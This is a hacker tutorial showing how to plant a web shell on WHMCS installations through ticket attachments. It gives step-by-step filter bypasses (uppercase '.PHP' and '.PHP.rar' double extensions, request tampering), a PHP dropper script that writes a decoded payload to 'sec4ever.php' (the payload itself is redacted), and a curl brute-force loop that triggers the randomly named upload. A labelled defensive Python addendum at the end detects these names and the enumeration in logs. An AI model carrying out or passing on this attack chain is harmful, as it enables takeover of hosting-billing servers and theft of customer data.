Credits: sec4ever, MadLeets and all Pakistani Haxors
This tutorial is about uploading a shell to WHMCS via ticket attachments.
First, let's talk about MIME types.
These are file extensions:
Code:
gif,png,rar,zip,php,asp,aspx
Apache uses the extension to decide how to handle a file.
For example, if you upload a file as b0x.gif,
Apache will serve it as a picture/image.
And if you upload it as b0x.php,
the file will be run as a PHP file.
Okay ... in Apache there are many extensions that are not defined, like rar.
So let's start: in WHMCS, go to submit a new ticket.
Code:
http://site.tld/whmcs/submitticket.php
You'll see this
So here, with the attachments, we have these prospects:
I: The PHP extension is allowed to be uploaded
But when we try to upload a PHP file, we'll get this result
To bypass this problem, you just have to change the extension from lowercase php to uppercase PHP, like this:
Code:
b0x.PHP
The extension is changed via Tamper Data.
Then submit it.
Our ticket is ready now, so we uploaded PHP.
This was our first prospect.
II: The PHP extension is not allowed to be uploaded on WHMCS
So we'll use an extension that is not defined in Apache,
like "rar", and we'll use Tamper Data too.
We'll upload it as "b0x.PHP.rar"
Don't forget the capital letters.
Then we'll have this
File uploaded successfully
But in WHMCS, when you use an attachment or upload one,
the file will automatically be renamed like this:
Code:
number_filename.extension
For example, our file b0x.PHP will become:
Code:
RandomNumber_b0x.PHP
We won't be able to know the number because it is random, so we have to try numbers.
Before that, let's make a small summary.
This code must be the attached file:
PHP Code:
<?php
$shellcode = "[base64-encoded payload removed]";
$b0x = fopen("sec4ever.php","w"); fwrite($b0x,base64_decode($shellcode)); ?>
This is an uploader script that will be written to the same folder (attachments).
Now upload it as before, via .PHP or a non-defined extension.
After that, use this code to generate/browse the site URLs and get the uploader in sec4ever.php
PHP Code:
<?
error_reporting(0); $url = "http://domain.tld/whmcs/"; $attachfolder = "attachments"; $attach= "b0x.PHP";
for($b0x=100000; $b0x<1000000;$b0x++){ $urls = "$url/$attachfolder/$b0x"; $urls.="_$attach"; $ch = @curl_init();
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_URL, $urls ); $result = @curl_exec($ch);
@curl_close($ch);
} ?>
Edit the variables to get the expected result.
Then, when the script has finished browsing the URLs auto-generated by the for loop,
the script will have requested your PHP code, but you will not be able to know what the number is!
But the script will generate the shell/uploader in sec4ever.php
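For defenders, an added example (not part of the original tutorial): a Python check that flags attachment names carrying a script extension in any segment or letter case, as with b0x.PHP and b0x.PHP.rar above, and spots one client requesting the same filename under many numeric prefixes. The extension list, the Apache combined log format, the threshold and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed list of extensions a server may map to a script handler; adjust to your config.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx"}

def risky_attachment(name):
    """Return the script extension hidden in a filename, or None.

    Every dot-separated segment is checked case-insensitively, because
    Apache's mod_mime ignores case and considers all extensions of a file,
    not only the last one (b0x.PHP and b0x.PHP.rar both qualify)."""
    for segment in name.lower().split(".")[1:]:
        if segment in SCRIPT_EXTS:
            return segment
    return None

# Path shape described on the page: /attachments/<number>_<filename>
ATTACH_RE = re.compile(r'"(?:GET|HEAD|POST) \S*/attachments/(\d+)_(\S+) HTTP/')

def enumeration_suspects(log_lines, threshold=3):
    """Map (client_ip, filename) -> count of distinct numeric prefixes tried,
    keeping only pairs that reach the threshold (3 is a demo value)."""
    prefixes = {}
    for line in log_lines:
        match = ATTACH_RE.search(line)
        if match:
            client = line.split(" ", 1)[0]
            prefixes.setdefault((client, match.group(2)), set()).add(match.group(1))
    return {key: len(nums) for key, nums in prefixes.items() if len(nums) >= threshold}

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /whmcs/attachments/100000_b0x.PHP HTTP/1.1" 404 196',
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /whmcs/attachments/100001_b0x.PHP HTTP/1.1" 404 196',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /whmcs/attachments/100002_b0x.PHP HTTP/1.1" 404 196',
    '198.51.100.4 - - [01/Jan/2024:10:05:00 +0000] "GET /whmcs/attachments/482913_invoice.pdf HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for name in ("b0x.PHP", "b0x.PHP.rar", "invoice.pdf"):
        print(name, "->", risky_attachment(name))
    print(enumeration_suspects(SAMPLE_LOG))
```

Names that are flagged are best rejected at upload time, and the attachments directory is safest kept outside the web root or served with script handlers disabled.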